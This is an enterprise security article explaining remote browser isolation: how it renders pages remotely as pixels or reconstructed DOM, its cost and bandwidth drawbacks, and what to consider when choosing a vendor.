andranik123 - stock.adobe.com
Browsers are essential, but because they were designed before security, privacy and regulatory compliance were critical factors, they are an easy target for cybercriminals looking to breach network defenses.
In response, companies have tried to mitigate browsers' vulnerabilities by maintaining allowlists and blocklists of URLs and DNS addresses, as well as using signature technology for data files and executables.
Keeping these controls up to date, however, is always a game of catch-up, and they cannot prevent zero-day attacks. Moreover, they can restrict or interfere with legitimate browser activities.
A more effective alternative -- and one gaining traction -- is remote browser isolation, a zero-trust approach that uses physical isolation to separate users' browsing activity from their device.
How remote browser isolation works
Remote browser isolation differs from local browser isolation, which uses sandboxing at either the app or OS level to separate the browser from a device. Local browser isolation is both resource- and administration-intensive, and it requires specific hardware and software components.
Remote browser isolation, by contrast, is primarily delivered as a service by a third-party provider, although some enterprises run it on a separate server attached to the corporate network. When users request a webpage -- whether via desktop or mobile browser -- the service creates an isolated browser session in a disposable containerized instance. The page is presented on users' browsers as a rendering, commonly as pixels over an HTML5 canvas.
Keyboard and mouse inputs are transmitted to the isolation service via an encrypted channel, and any resulting updates to the remote browser webpage are sent back to the endpoint device in the same way. Because no active content is downloaded, any hidden malware or viruses in the page are unable to reach the endpoint.
This approach completely isolates users' browsing activities from enterprise endpoints and networks, thereby providing protection from both known and unknown threats. Any threat risk is moved to the remote server sessions, which can be reset to a known-good state on every new browsing session, tab or page request. Remote browser isolation benefits the user's overall experience. It enables users to access websites without worrying about downloading malicious webpages even if their browsers are outdated, vulnerable or have insecure plugins installed.
Costs an issue, but remote browser isolation benefits are widespread
The main disadvantage with remote browser isolation is cost. Pixel pushing is resource-intensive and therefore expensive, and many services are built on centralized foundations that don't scale, as well as distributed architectures. Remote browser isolation also requires large amounts of bandwidth to avoid latency issues. Document Object Model (DOM) reconstruction is an alternative to pixel pushing. With DOM, a page's HTML, CSS and scripts are inspected, cleaned and repacked before being forwarded. However, malicious code could reach the endpoint if the threat is not detected and a page's layout or functionality can also get broken.
Adopting remote browser isolation can benefit an organization's overall enterprise cybersecurity strategy as it lets users access the internet, while mitigating some of the inherent risks. As a zero-trust technology, it gives companies an obvious choice in some situations. It takes less time to manage than traditional allowlists and blocklists, especially for those products that don't require agents to be installed on users' devices. Costs, meanwhile, can be addressed by, for example, deploying remote browser isolation only to high-risk users and C-level employees.
Before deciding on a service, companies should thoroughly research potential remote isolation vendors and determine how their services are implemented, what their scalability is, and whether they support specific plugins and remote viewers for certain file types.
If employees aren't offered relatively seamless UX, they may well try alternative -- and riskier -- ways to access the internet for information they need.